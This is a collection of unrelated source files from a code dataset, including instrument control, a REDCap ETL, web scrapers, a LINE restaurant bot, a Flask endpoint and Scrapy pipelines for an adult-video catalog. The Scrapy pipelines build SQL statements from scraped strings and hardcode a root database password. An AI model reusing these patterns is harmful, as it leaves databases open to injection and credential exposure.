output(self, on):\n if on:\n self.inst.write(\"POW:STAT ON\")\n self.logger.info(\"Output ON\")\n else:\n self.inst.write(\"POW:STAT OFF\")\n self.logger.info(\"Output OFF\")\n\n def pulse(self, on):\n if on:\n self.inst.write(\"PULS:STAT ON\")\n self.logger.info(\"Pulse ON\")\n else:\n self.inst.write(\"PULS:STAT OFF\")\n self.logger.info(\"Pulse OFF\")\n\n\nclass HP83752A(HP_SG):\n '''Class for 83752A\n '''\n\n FREQ_MODE = ('FIXED', 'FIX', 'CW', 'SWEEP', 'SWE', 'SWCW')\n SWEEP_MODE = 'SWE'\n\n def __init__(self, resource, power_bounds=(-15.0, 20.0)):\n if power_bounds[0] < -15.0 or power_bounds[1] > 20.0:\n raise ValueError('Invalid power bounds.')\n HP_SG.__init__(self, resource, power_bounds)\n\n # Sweep related specific functions\n\n def sweep_trigger(self):\n 'Send immediate point to point event in step sweep mode.'\n self.inst.write('SWE:POIN:TRIG')\n\n def double_trigger(self):\n 'Send sweep start trigger and immediate point to point trigger.'\n self.inst.write('TRIG;SWE:POIN:TRIG')\n\n def set_sweep_freq_step(self, num):\n '''either set_sweep_points() or this function should be enough.\n\n Maybe this function should not be used because setting step raises an error in instrument.\n See programming manual p. 2-69.\n '''\n\n self.inst.write('SWE:STEP %d' % num)\n\n def set_sweep_pow_step(self, num):\n '''either set_sweep_points() or this function should be enough.\n\n Maybe this function should not be used because setting step raises an error in instrument.\n See programming manual p. 
2-68.\n        '''\n\n        self.inst.write('SWE:POW:STEP %d' % num)\n\n\ndef main():\n    return\n\nif __name__ == '__main__':\n    main()\n","sub_path":"CUI/Inst/sg.py","file_name":"sg.py","file_ext":"py","file_size_in_byte":13713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"}
+{"seq_id":"549971685","text":"\"\"\"\nProcess REDCap DET notifications.\n\nThis command group supports custom ETL routines specific to a project in\nREDCap.\n\"\"\"\nimport os\nimport click\nimport logging\nfrom datetime import datetime, timezone\nfrom functools import wraps\nfrom typing import Callable, Iterable, Optional, Tuple\nfrom urllib.parse import urljoin\nfrom id3c.cli.command import with_database_session\nfrom id3c.cli.redcap import CachedProject, is_complete\nfrom id3c.db.session import DatabaseSession\nfrom id3c.db.datatypes import as_json, Json\nfrom id3c.cli.command.geocode import pickled_cache\nfrom . import etl\n\n\nLOG = logging.getLogger(__name__)\n\n\n# XXX FIXME: I don't think we should hardcode a cache name like this,\n# particularly with a name that doesn't give any hint as to what uses it or\n# what it contains. The `id3c geocode` command, for instance, explicitly\n# parameterizes the cache file as an option.\n#\n# Going a step further, I don't think @command_for_project should even be\n# providing the \"cache\" parameter. What is cached and where it is stored is\n# something specific to each REDCap DET routine, not a global invariant.\n# -trs, 19 Dec 2019\nCACHE_FILE = 'cache.pickle'\n\n\n@etl.group(\"redcap-det\", help = __doc__)\ndef redcap_det():\n    pass\n\n\ndef command_for_project(name: str,\n                        redcap_url: str,\n                        project_id: int,\n                        revision: int,\n                        required_instruments: Iterable[str] = [],\n                        include_incomplete: bool = False,\n                        raw_coded_values: bool = False,\n                        **kwargs) -> Callable[[Callable], click.Command]:\n    \"\"\"\n    Decorator to create REDCap DET ETL subcommands.\n\n    The decorated function should be an ETL routine for an individual DET and\n    REDCap record pair. It must take two dictionaries, *det* and\n    *redcap_record*, as arguments. The function must return another dictionary\n    which represents a FHIR document to insert into ``receiving.fhir``. If no\n    FHIR document is appropriate, the function should return ``None``.\n\n    *name* is the name of the ETL command, which will be invokable as ``id3c\n    etl redcap-det <name>``. *name* is also used in the processing log for\n    each DET.\n\n    *redcap_url* and *project_id* are used to select DETs for processing from\n    ``receiving.redcap_det``. They will also be used to make requests to the\n    appropriate REDCap web API.\n\n    *required_instruments* is an optional list of REDCap instrument names which\n    are required for the decorated routine to run.\n\n    *revision* is an integer specifying the version of the routine. If it\n    increments, previously processed DETs will be re-processed by the new\n    version of the routine.\n\n    *raw_coded_values* is a boolean specifying if raw coded values are returned\n    for multiple choice answers. When false (default), the entire string labels\n    are returned.\n    \"\"\"\n    etl_id = {\n        \"etl\": f\"redcap-det {name}\",\n        \"revision\": revision,\n    }\n\n    det_contains = {\n        \"redcap_url\": redcap_url,\n        \"project_id\": str(project_id), # REDCap DETs send project_id as a string\n    }\n\n    def decorator(routine: Callable[..., Optional[dict]]) -> click.Command:\n        @click.option(\"--log-output/--no-output\",\n            help = \"Write the output FHIR documents to stdout. 
You will likely want to redirect this to a file\",\n default = False)\n\n @redcap_det.command(name, **kwargs)\n @with_database_session\n @wraps(routine)\n\n def decorated(*args, db: DatabaseSession, log_output: bool, **kwargs):\n LOG.debug(f\"Starting the REDCap DET ETL routine {name}, revision {revision}\")\n\n redcap_det = db.cursor(f\"redcap-det {name}\")\n redcap_det.execute(\"\"\"\n select redcap_det_id as id, document\n from receiving.redcap_det\n where not processing_log @> %s\n and document::jsonb @> %s\n order by id\n for update\n \"\"\", (Json([etl_id]), Json(det_contains)))\n\n with pickled_cache(CACHE_FILE) as cache:\n for det in redcap_det:\n with db.savepoint(f\"redcap_det {det.id}\"):\n LOG.info(f\"Processing REDCap DET {det.id}\")\n\n instrument = det.document['instrument']\n\n # Only pull REDCap record if\n # `include_incomplete` flag was not included and\n # the current instrument is complete\n if not include_incomplete and not is_complete(instrument, det.document):\n LOG.debug(f\"Skipping incomplete or unverified REDCap DET {det.id}\")\n mark_skipped(db, det.id, etl_id)\n continue\n\n redcap_record = get_redcap_record_from_det(det.document, raw_coded_values)\n\n if not redcap_record:\n LOG.debug(f\"REDCap record is missing or invalid. Skipping REDCap DET {det.id}\")\n mark_skipped(db, det.id, etl_id)\n continue\n\n # Only process REDCap record if all required instruments are complete\n incomplete_instruments = {\n instrument\n for instrument\n in required_instruments\n if not is_complete(instrument, redcap_record)\n }\n\n if incomplete_instruments:\n LOG.debug(f\"The following required instruments «{incomplete_instruments}» are not yet marked complete. \" + \\\n f\"Skipping REDCap DET {det.id}\")\n mark_skipped(db, det.id, etl_id)\n continue\n\n bundle = routine(db = db, cache = cache, det = det, redcap_record = redcap_record)\n\n if not bundle:\n mark_skipped(db, det.id, etl_id)\n continue\n\n if log_output:\n print(as_json(bundle))\n\n insert_fhir_bundle(db, bundle)\n mark_loaded(db, det.id, etl_id, bundle['id'])\n\n\n\n return decorated\n return decorator\n\n\ndef get_redcap_record_from_det(det: dict, raw: bool) -> Optional[dict]:\n \"\"\"\n Fetch the REDCap record for the given *det* notification.\n\n The *raw* parameter indicates whether to pull the raw coded values or labels\n for multiple choice answers.\n\n The DET's ``redcap_url``, ``project_id``, and ``record`` fields are used to\n make the API call.\n\n All instruments will be fetched.\n \"\"\"\n api_url = urljoin(det[\"redcap_url\"], \"api/\")\n api_token = get_redcap_api_token(api_url)\n\n project_id = int(det[\"project_id\"])\n\n try:\n record_id = str(det[\"record\"])\n except ValueError:\n return None\n\n LOG.info(f\"Fetching REDCap record {record_id}\")\n\n project = CachedProject(api_url, api_token, project_id)\n record = project.record(record_id, raw = raw)\n\n # XXX TODO: Handle records with repeating instruments or longitudinal\n # events.\n return record[0] if record else None\n\n\ndef get_redcap_api_token(api_url: str) -> str:\n \"\"\"\n Returns the authentication token configured for use with the REDCap web API\n endpoint *api_url*.\n\n Requires the environmental variables ``REDCAP_API_URL`` and\n ``REDCAP_API_TOKEN``. 
``REDCAP_API_URL`` must match the provided *api_url*\n as a safety check.\n \"\"\"\n url = os.environ.get(\"REDCAP_API_URL\")\n token = os.environ.get(\"REDCAP_API_TOKEN\")\n\n if not url and not token:\n raise Exception(f\"The environment variables REDCAP_API_URL and REDCAP_API_TOKEN are required.\")\n elif not url:\n raise Exception(f\"The environment variable REDCAP_API_URL is required.\")\n elif not token:\n raise Exception(f\"The environment variable REDCAP_API_TOKEN is required.\")\n\n # This comparison may need URL canonicalization in the future.\n if url != api_url:\n raise Exception(f\"The environment variable REDCAP_API_URL does not match the requested API endpoint «{api_url}»\")\n\n return token\n\n\ndef insert_fhir_bundle(db: DatabaseSession, bundle: dict) -> None:\n \"\"\"\n Insert FHIR bundles into the receiving area of the database.\n \"\"\"\n LOG.debug(f\"Inserting FHIR bundle «{bundle['id']}»\")\n\n fhir = db.fetch_row(\"\"\"\n insert into receiving.fhir(document)\n values (%s)\n\n returning fhir_id as id\n \"\"\", (Json(bundle),))\n\n assert fhir.id, \"Insert affected no rows!\"\n\n LOG.info(f\"Inserted FHIR document {fhir.id} «{bundle['id']}»\")\n\n\ndef mark_loaded(db: DatabaseSession, det_id: int, etl_id: dict, bundle_uuid: str) -> None:\n LOG.debug(f\"Marking REDCap DET record {det_id} as loaded\")\n mark_processed(db, det_id, {**etl_id, \"status\": \"loaded\", \"fhir_bundle_id\": bundle_uuid})\n\n\ndef mark_skipped(db: DatabaseSession, det_id: int, etl_id: dict) -> None:\n LOG.debug(f\"Marking REDCap DET record {det_id} as skipped\")\n mark_processed(db, det_id, {**etl_id, \"status\": \"skipped\"})\n\n\ndef mark_processed(db: DatabaseSession, det_id: int, entry = {}) -> None:\n LOG.debug(f\"Appending to processing log of REDCap DET record {det_id}\")\n\n data = {\n \"det_id\": det_id,\n \"log_entry\": Json({\n **entry,\n \"timestamp\": datetime.now(timezone.utc),\n }),\n }\n\n with db.cursor() as cursor:\n cursor.execute(\"\"\"\n update receiving.redcap_det\n set processing_log = processing_log || %(log_entry)s\n where redcap_det_id = %(det_id)s\n \"\"\", data)\n","sub_path":"lib/id3c/cli/command/etl/redcap_det.py","file_name":"redcap_det.py","file_ext":"py","file_size_in_byte":9922,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"235821263","text":"# Copyright 2018 Figo Individual. 
All Rights Reserved.\nimport sqlite3 # database module (unused below)\nfrom bs4 import BeautifulSoup # HTML parsing module\nimport time # time module\nfrom datetime import datetime\nfrom selenium import webdriver # browser automation module\nimport xlwt\n\nprint(\"Enter a keyword, then press Enter to start crawling\")\nword=input() # keyword typed by hand; if you have a fixed keyword, replace this with word='keyword'\nurls='https://www.wukong.com/search/?keyword={}'.format(word) # search URL for the keyword\nchrome_options = webdriver.ChromeOptions()\nchrome_options.add_argument('--headless')\nchrome_options.add_argument('--disable-gpu')\ndriv = webdriver.Chrome(chrome_options=chrome_options)\ndriv.get(urls) # open the URL in headless Chrome\ndriv.set_page_load_timeout(30) # set a load timeout, then catch the timeout exception\n\n# helper that simulates scrolling the scrollbar to the bottom of the page\ndef scroll(driv): \n    driv.execute_script(\"\"\" \n        (function () { \n            var y = document.body.scrollTop; \n            var step = 100; \n            window.scroll(0, y); \n            \n            \n            function f() { \n                if (y < document.body.scrollHeight) { \n                    y += step; \n                    window.scroll(0, y); \n                    setTimeout(f, 50); \n                } \n                else { \n                    window.scroll(0, y); \n                    document.title += \"scroll-done\"; \n                } \n            } \n            \n            \n            setTimeout(f, 1000); \n        })(); \n        \"\"\")\nprint(\"Simulating scrolling to the bottom of the page\")\nb=0\nc=0\nwhile b<5: # loop; change this value to choose how many times to scroll\n    scroll(driv) # scroll once\n    b=b+1\n    print('Scrolled {} times'.format(b))\n    c=c+3\n    time.sleep(c) # rest for c seconds\n    \n# by now the page has been scrolled several times and is the final page to parse\n\nworkbook = xlwt.Workbook(encoding='utf-8')\nworksheet1 = workbook.add_sheet(\"悟空问答\")\ntitle = ['No.','Question URL','Keyword','Question','Answers','Favorites','Likes','Comments']\nfor i in range(8):\n    worksheet1.write(0, i, title[i])\n\nsoup = BeautifulSoup(driv.page_source, \"lxml\") # parse the current page\na=1 \nfor li in soup.find_all('div',class_=\"question-v3\"):\n    channels=word\n    url='www.wukong.com'+li.a['href'] # address of each question\n    question=li.find('a',target=\"_blank\").text\n    answer=li.find('span',class_=\"question-answer-num\").text\n    follow=li.find('span',class_=\"question-follow-num\").text\n    try: # catch exceptions\n        like=li.find('span',class_=\"like-num\").text # probe statement\n    except BaseException: # exception type\n        like=0 # run this if the probe statement raised\n    else: # run the next statement if nothing raised\n        like=li.find('span',class_=\"like-num\").text \n    try: # same as above\n        review=li.find('span',class_=\"comment-count\").text\n    except BaseException:\n        review=0\n    else: \n        review=li.find('span',class_=\"comment-count\").text\n    \n    one = (None,url,channels,question,answer,follow,like,review)\n    \n    if follow=='暂无收藏': # the site shows this literal text (meaning: no favorites yet); skip such questions\n        continue\n    elif question=='': # skip questions with no text\n        continue\n    elif int(like)==0: # skip questions with zero likes; the threshold can be tuned here\n        continue\n    elif int(review)==0:\n        continue\n    elif a<50: # number of questions to crawl; while fewer than 50 have been taken, crawl this one\n        print(\"Crawling question {}\".format(a))\n        for i in range(8):\n            if i == 0:\n                worksheet1.write(a, i, a)\n            else:\n                worksheet1.write(a, i, one[i])\n        a=a+1\n        \n    else: # otherwise break out of the loop and stop the crawler\n        break\n    \nworkbook.save(\"D:/xxx\" + datetime.now().strftime('%Y_%m_%d_%H_%M_%S') + \".xls\")\nprint(\"Crawling finished\")\nprint(\"Closing the browser\")\ndriv.quit()","sub_path":"wukong/wukongToXLS.py","file_name":"wukongToXLS.py","file_ext":"py","file_size_in_byte":3931,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"}{"seq_id":"542923185","text":"import os\nimport sys\nsys.path.append(os.popen('pwd').read().rstrip())\n\nfrom pyjenkins.functions.english_functions import *\n\nOPERATIONS_L = [\"pluralized\", \"singularized\", \"capitalized\", \"end sentence\"]\nFUNCTIONS_L = [make_plural, make_singular, capitalize, end_sentence]\nANSWERS_D = {\n    \"pluralized\": {\n        \"goat\": \"goats\",\n        \"carrot\": \"carrots\",\n        \"bone\": \"bones\",\n        \"sword\": \"swords\"\n    },\n    \"singularized\": {\n        \"characters\": \"character\",\n        \"books\": \"book\",\n        \"grails\": \"grail\",\n        \"horses\": 
\"horse\"\n },\n \"capitalized\": {\n \"arthur\": \"Arthur\",\n \"jeremy\": \"Jeremy\",\n \"caesar\": \"Caesar\",\n \"waldo\": \"Waldo\"\n },\n \"end sentence\": {\n \"this is a sentence\": \"this is a sentence.\",\n \"i have to buy groceries today\": \"i have to buy groceries today.\",\n \"welcome to the jungle\": \"welcome to the jungle.\",\n \"what is the square root of pi\": \"what is the square root of pi.\"\n }\n}\n\nif __name__ == \"__main__\":\n for i in range(0,len(OPERATIONS_L)):\n op = OPERATIONS_L[i]\n func = FUNCTIONS_L[i]\n\n for answer_key in sorted(ANSWERS_D[op].keys()):\n func_val = func(answer_key)\n assert_val = ANSWERS_D[op][answer_key]\n print(\"%s: %s -> %s\" % (op, answer_key, assert_val))\n assert func_val == assert_val\n\n print(\"all english tests complete\")\n","sub_path":"tests/test_english.py","file_name":"test_english.py","file_ext":"py","file_size_in_byte":1410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"337284955","text":"'''\nCreated on 2018年10月23日\n@author: Even\n\nFunction: All the eat (restaurant) information functions for Line\n'''\nimport requests\nimport random\nfrom datetime import datetime\n\nfrom linebot import LineBotApi, WebhookParser\nfrom linebot.exceptions import InvalidSignatureError, LineBotApiError\nfrom linebot.models import (\n TemplateSendMessage, TextSendMessage, ButtonsTemplate,\n ImageSendMessage, StickerSendMessage,\n MessageEvent, \n PostbackAction, MessageAction,\n URIAction, DatetimePickerAction,\n ConfirmTemplate, CarouselTemplate, CarouselColumn,\n ImageCarouselTemplate, ImageCarouselColumn, MessageTemplateAction,\n PostbackTemplateAction, URITemplateAction\n)\n\nfrom linebot.models.events import PostbackEvent\n\ndef Get_Eat(sGOOGLE_PLACES_API_KEY, sLat, sLng): # 尋找餐廳 => 傳入經緯度, 先緯後經 Hotel => lodging\n\n # 使用 Google API nearby search (每次只會回傳20筆資料, 如果要換頁要傳入next_page_token to pagetoken\n # rankby=distance&type=restaurant (餐廳) (回傳資料是 json) \n sUrl = \"https://maps.googleapis.com/maps/api/place/nearbysearch/json?key={}&location={},{}&rankby=distance&type=restaurant&language=zh-TW\".format(sGOOGLE_PLACES_API_KEY, sLat, sLng)\n sGoogleMap_results = requests.get(sUrl)\n\n print (\"sUrl => \",sUrl) \n #print (\"sGoogleMap_results => \",sGoogleMap_results) \n # json 轉 dictionary 再轉 list\n dictGoogleMap_results = sGoogleMap_results.json()\n # 判斷回傳的資料是否正確\n print (\"Eat Google json search result => \",str(dictGoogleMap_results[\"status\"]))\n \n # for line message\n sMsg_Img_url=[]\n sMsg_Title=[]\n sMsg_Text=[]\n sMsg_uri=[]\n # status OK 代表 Google 有正常運作\n if dictGoogleMap_results[\"status\"]=='OK' :\n listRestaurants = dictGoogleMap_results[\"results\"]\n \n # 篩選評分 rating\n dStarttime = datetime.now()\n # 列表解析法\n listRestaurants_Filter = [item for item in listRestaurants if float(item.get(\"rating\",0)) >= 4.2]\n print (\"listRestaurants_Filter => Count:\"+str(len(listRestaurants_Filter))+\" => \"+str(listRestaurants_Filter))\n \n # 若符合條件的數量 >= 5 , 就隨機挑選5 間餐廳, 且不重覆, 否則就全部顯示\n if len(listRestaurants_Filter)>=1 :\n listRestaurant_Random = random.sample(listRestaurants_Filter,min(5,len(listRestaurants_Filter)))\n # 開始組合相關資訊\n for Restaurant in listRestaurant_Random:\n \n # 檢查餐廳有沒有照片,有的話會顯示\n if Restaurant.get(\"photos\") is None:\n # 用沒有照片的照片替代\n sMsg_Img_url.append('https://developers.google.com/maps/documentation/maps-static/images/quota.png')\n else:\n # 只取一張照片\n sPhoto_reference = Restaurant[\"photos\"][0][\"photo_reference\"]\n 
sMsg_Img_url.append(\"https://maps.googleapis.com/maps/api/place/photo?key={}&photoreference={}&maxwidth=400\".format(sGOOGLE_PLACES_API_KEY, sPhoto_reference))\n                \n                # name and rating\n                sMsg_Title.append(Restaurant.get(\"name\",\"\"))\n                # address\n                sMsg_Text.append('Rate:'+str(Restaurant.get(\"rating\",\"\"))+'\\n'+Restaurant.get(\"vicinity\",\"\"))\n                \n                # build the restaurant's Google Maps URL\n                sRestaurant_url = \"https://www.google.com/maps/search/?api=1&query={res_lat},{res_lng}&query_place_id={res_place_id}\".format(\n                    res_lat=Restaurant[\"geometry\"][\"location\"][\"lat\"],\n                    res_lng=Restaurant[\"geometry\"][\"location\"][\"lng\"],\n                    res_place_id=Restaurant[\"place_id\"]\n                )\n                sMsg_uri.append(sRestaurant_url)\n        else :\n            listRestaurant_Random = None\n        \n        dEndtime = datetime.now()\n        # log the running time \n        print(\"Nearby restaurants filter using %.6f sec\"%(float((dEndtime-dStarttime).microseconds)/1000000))\n    \n    print(\"sMsg_Img_url:\",sMsg_Img_url,\"\\n\" \\\n          \"sMsg_Title:\",sMsg_Title,\"\\n\" \\\n          \"sMsg_Text:\",sMsg_Text,\"\\n\" \\\n          \"sMsg_uri:\",sMsg_uri,\"\\n\" \\\n          )\n    \n    if len(sMsg_Title)<=0 :\n        sText = \"抱歉!! 找不到足夠的資料!!\\n\" \\\n                \"Sorry, Can't find enough data!!\" \n        Msg_Template = TextSendMessage(text=sText) \n    else :\n        # reply using a carousel template; start with an empty column list so columns can be appended below\n        Msg_Template = TemplateSendMessage(\n            alt_text='Nearby restaurants search',\n            template=CarouselTemplate(\n                columns=[]\n            )\n        )\n        \n        for i in range(0, min(len(sMsg_Title),10)):\n            Msg_Template.template.columns.append(\n                CarouselColumn(\n                    thumbnail_image_url=sMsg_Img_url[i],\n                    title=sMsg_Title[i][:40],\n                    text=sMsg_Text[i][:60],\n                    actions=[\n                        URIAction(\n                            label='Show map (看地圖)',\n                            uri=sMsg_uri[i]\n                        ) \n                    ]\n                )\n            )\n    \n    \n    return Msg_Template\n","sub_path":"HelloWorld/LineFunctions/LineFunctions_Eat.py","file_name":"LineFunctions_Eat.py","file_ext":"py","file_size_in_byte":5465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"}{"seq_id":"332962170","text":"from flask import Flask, flash, redirect, render_template, request, jsonify\n\nfrom .core import Article\nfrom .join import aff_contrib_inner_join\n\n\napp = Flask(__name__)\napp.secret_key = \"C(*JD@J(*HS@S)S(\"\n\n\n@app.route(\"/\", methods=[\"GET\", \"POST\"])\ndef upload_file():\n    if request.method == \"POST\":\n        try:\n            xml_file = request.files[\"xml_file\"]\n        except KeyError:\n            flash(\"Missing xml_file input\")\n            return redirect(request.url)\n        try:\n            article = Article(xml_file)\n        except Exception:\n            flash(\"Error: can't load the given file\")\n            return redirect(request.url)\n        return jsonify(aff_contrib_inner_join(article))\n    return render_template(\"upload.html\")\n","sub_path":"clea/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"}{"seq_id":"8859552","text":"from django.conf.urls import url\n\nfrom . 
import views\napp_name = 'polls'\nurlpatterns = [\n url(r'^$', views.index, name='index'),\n url(r'^lgoin_view$', views.lgoin_view, name='lgoin_view'),\n url(r'^logout_view$', views.logout_view, name='logout_view'),\n url(r'^my_view$', views.my_view, name='my_view'),\n\n\n\n url(r'^(?P<question_id>[0-9]+)/$', views.detail, name='detail'),\n url(r'^(?P<question_id>[0-9]+)/results/$', views.results, name='results'),\n url(r'^(?P<question_id>[0-9]+)/vote/$', views.vote, name='vote'),\n\n\n\n\n]","sub_path":"django_for_test/polls/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"48730707","text":"from typing import (\n Dict,\n Iterable,\n Optional,\n Sequence,\n)\nfrom warnings import warn\n\nimport numpy as np\nimport xarray as xr\nfrom skimage.measure._regionprops import _RegionProperties\n\nfrom starfish.core.binary_mask import BinaryMaskCollection\nfrom starfish.core.types import Coordinates\n\n\nclass SegmentationMaskCollection(BinaryMaskCollection):\n \"\"\"Deprecated in favor of BinaryMaskCollection.\"\"\"\n def __init__(\n self,\n masks: Iterable[xr.DataArray],\n props: Optional[Iterable[Optional[_RegionProperties]]] = None,\n ):\n warn(\n f\"{self.__class__.__name__} has been deprecated in favor of \"\n f\"{BinaryMaskCollection.__name__}\",\n DeprecationWarning\n )\n super().__init__(masks, props)\n\n @classmethod\n def from_label_image(\n cls,\n label_image: np.ndarray,\n physical_ticks: Dict[Coordinates, Sequence[float]]\n ) -> \"BinaryMaskCollection\":\n warn(\n f\"{cls.__class__.__name__} has been deprecated in favor of \"\n f\"{BinaryMaskCollection.__name__}\",\n DeprecationWarning\n )\n return BinaryMaskCollection.from_label_image(label_image, physical_ticks)\n\n @classmethod\n def from_disk(cls, path: str) -> \"BinaryMaskCollection\":\n warn(\n f\"{cls.__class__.__name__} has been deprecated in favor of \"\n f\"{BinaryMaskCollection.__name__}\",\n DeprecationWarning\n )\n return BinaryMaskCollection.from_disk(path)\n","sub_path":"starfish/core/segmentation_mask/segmentation_mask.py","file_name":"segmentation_mask.py","file_ext":"py","file_size_in_byte":1553,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"26223054","text":"import os\nimport unittest\nfrom io import IOBase\n\nfrom sym_api_client_python.clients.message_client import open_file\n\n\ndef get_path_to_file():\n path_to_resources = os.path.join(os.path.dirname(__file__), '../resources/bot-config.json')\n return os.path.normpath(path_to_resources)\n\n\nclass TestMessageClient(unittest.TestCase):\n def test_open_file_with_filename(self):\n path = get_path_to_file()\n with open_file(path) as file:\n self.assertIsInstance(file, IOBase)\n self.assertTrue(file.readable())\n self.assertTrue(file.closed)\n\n def test_open_file_with_opened_file(self):\n path = get_path_to_file()\n with open(path) as file:\n with open_file(file) as opened_file:\n self.assertEqual(file, opened_file)\n","sub_path":"tests/clients/test_message_client.py","file_name":"test_message_client.py","file_ext":"py","file_size_in_byte":793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"30439407","text":"# Challenge 050\r\n\r\n\"\"\" Ask the user to enter a number between 10 and 20. If they enter a value under 10, display the message\r\n\"Too low\" and ask them to try again. 
If they enter a value above 20, display the message \"Too high\" and ask\r\nthem to try again. Keep repeating this until they enter a value that is between 10 and 20 and then display\r\nthe message \"Thank you\". \"\"\" \r\n\r\nuser_number = int(input(\"Enter a number between 10 and 20:\\n>> \"))\r\n\r\nwhile user_number < 10 or user_number > 20:\r\n\r\n    if user_number < 10:\r\n        print('Too low')\r\n\r\n    else:\r\n        print('Too high')\r\n\r\n    user_number = int(input('Try again:\\n>> '))\r\n\r\nprint('Thank you')\r\n","sub_path":"ex050.py","file_name":"ex050.py","file_ext":"py","file_size_in_byte":659,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"}{"seq_id":"641485559","text":"import codecs\nimport json\nimport os\nimport pymysql\nimport time\nimport logging\n\nfrom scrapy import Request\nfrom scrapy.pipelines.images import ImagesPipeline\nfrom scrapy.exceptions import DropItem\n\nclass JavbusThumbPipeline(ImagesPipeline):\n    def get_media_requests(self, item, info):\n        yield Request(url = item['thumb_url'], meta = {'bango' : item['bango']})\n\n    def file_path(self, request, response=None, info=None):\n        bango = request.meta['bango']\n        image_type = request.url.split('/')[-1].split('.')[-1]\n        return '%s/%s.%s' %(bango, 'thumb',image_type)\n\n    def item_completed(self, result, item, info):\n        path = [x['path'] for ok, x in result if ok]\n\n        item['thumb_path'] = path\n        return item\n\nclass JavbusCoverPipeline(ImagesPipeline):\n    def get_media_requests(self, item, info):\n        yield Request(url = item['cover_url'], meta = {'bango' : item['bango']})\n\n    def file_path(self, request, response=None, info=None):\n        bango = request.meta['bango']\n        image_type = request.url.split('/')[-1].split('.')[-1]\n        return '%s/%s.%s' %(bango, 'cover',image_type)\n\n    def item_completed(self, result, item, info):\n        path = [x['path'] for ok, x in result if ok]\n        item['cover_path'] = path\n        return item\n\nclass JavbusPreviewPipeline(ImagesPipeline):\n    preview = 0\n    def get_media_requests(self, item, info):\n        for preview in item['preview_urls']:\n            self.preview += 1\n            yield Request(url = preview, meta = {'bango' : item['bango']})\n\n    def file_path(self, request, response=None, info=None):\n        bango = request.meta['bango']\n        image_type = request.url.split('/')[-1].split('-')[-1]\n        return '%s/%s%s.%s' %(bango, 'preview', '_', image_type)\n\n    def item_completed(self, result, item, info):\n        path = [x['path'] for ok, x in result if ok]\n        item['preview_paths'] = path\n        return item\n\nclass JavbusPipeline(object):\n    def __init__(self):\n        self.conn = pymysql.connect(host='127.0.0.1', user='root', passwd='1234', db='Javbus', charset='utf8')\n        self.cursor = self.conn.cursor()\n        # the actress and magnets columns are needed so the 15-value INSERT in process_item matches the schema\n        sql = '''\n        CREATE TABLE IF NOT EXISTS MovieData(\n        bango VARCHAR(200) PRIMARY KEY,\n        title TEXT,\n        artwork VARCHAR(200),\n        postTime DATE,\n        length INTEGER,\n        director VARCHAR(200),\n        producer VARCHAR(200),\n        series VARCHAR(200),\n        types TEXT,\n        actress TEXT,\n        magnets TEXT,\n        link VARCHAR(200),\n        thumb_path TEXT,\n        cover_path TEXT,\n        preview_paths TEXT\n        ) DEFAULT CHARSET=utf8;'''\n        self.cursor.execute(sql)\n        sql = '''\n        CREATE TABLE IF NOT EXISTS ActressData(\n        aid VARCHAR(50) PRIMARY KEY,\n        name VARCHAR(200)\n        ) DEFAULT CHARSET=utf8;'''\n        self.cursor.execute(sql)\n        sql = '''\n        CREATE TABLE IF NOT EXISTS Magnets(\n        magnet VARCHAR(255) PRIMARY KEY,\n        name VARCHAR(200),\n        size INT\n        ) DEFAULT CHARSET=utf8;'''\n        self.cursor.execute(sql)\n        self.conn.commit()\n\n    def process_item(self, item, spider):\n        sql = '''\n        INSERT INTO MovieData VALUES (\n        %s\n        
)'''%(self.get_item_all_info(item))\n self.cursor.execute(sql)\n self.conn.commit()\n\n def get_item_all_info(self, item):\n s = '''\n '%s',\n '%s',\n '%s',\n '%s',\n %s,\n '%s',\n '%s',\n '%s',\n '%s',\n '%s',\n '%s',\n '%s',\n '%s',\n '%s',\n '%s'\n '''%(\n item['bango'],\n item['title'],\n item['artwork'],\n time.strftime('%Y-%m-%d',item['postTime']),\n item['length'],\n item['director'],\n item['producer'],\n item['series'],\n json.dumps(item['types']),\n json.dumps(item['actress'],ensure_ascii=False),\n json.dumps(item['magnets'],ensure_ascii=False),\n item['link'],\n json.dumps(item['thumb_path'],ensure_ascii=False),\n json.dumps(item['cover_path'],ensure_ascii=False),\n json.dumps(item['preview_paths'],ensure_ascii=False),\n )\n return s\n\nclass JavTypePipeline(object):\n def __init__(self):\n self.conn = pymysql.connect(host='127.0.0.1', user='root', passwd='1234', db='Javbus', charset='utf8')\n self.cursor = self.conn.cursor()\n\n def open_spider(self, spider):\n self.cursor.execute('''\n CREATE TABLE IF NOT EXISTS TypeData(\n id INT PRIMARY KEY,\n type TINYTEXT,\n parent TINYTEXT\n ) DEFAULT CHARSET=utf8;''')\n\n def close_spider(self, spider):\n self.cursor.close()\n self.conn.close()\n\n def process_item(self, item, spider):\n sql = '''\n INSERT INTO TypeData(id, type, parent)\n VALUES (%s, \"%s\", \"%s\");\n ''' %(item['hash'], item['name'], item['topType'])\n try:\n self.cursor.execute(sql)\n self.conn.commit()\n except:\n print(sql)\n self.conn.rollback()\n","sub_path":"javbus/javbus/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":5340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"609543024","text":"from interface_inicial import Ui_MainWindow\nfrom PyQt5 import QtWidgets\nimport sys\n\nfrom pydm import PyDMApplication\nfrom interface_dioptas import setup_dioptas, ui_dioptas\ncontroller_dioptas = setup_dioptas()\ndioptas = ui_dioptas(ctl=controller_dioptas)\n\ndef interface_inicial_setupUI():\n app = QtWidgets.QApplication(sys.argv)\n window_II = 